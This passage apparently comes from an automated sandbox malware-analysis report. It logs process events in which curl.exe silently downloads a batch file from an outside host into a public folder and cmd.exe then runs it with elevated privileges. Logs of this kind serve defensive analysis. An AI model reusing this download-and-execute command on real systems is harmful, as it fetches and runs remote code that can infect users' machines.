                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:12:01:23
                                Start date:25/11/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:2
                                Start time:12:01:23
                                Start date:25/11/2024
                                Path:C:\Windows\SysWOW64\curl.exe
                                Wow64 process (32bit):true
                                Commandline:curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
                                Imagebase:0xa50000
                                File size:470'528 bytes
                                MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:9
                                Start time:12:01:26
                                Start date:25/11/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
                                Imagebase:0x410000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:10
                                Start time:12:01:26
                                Start date:25/11/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff75da10000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                No disassembly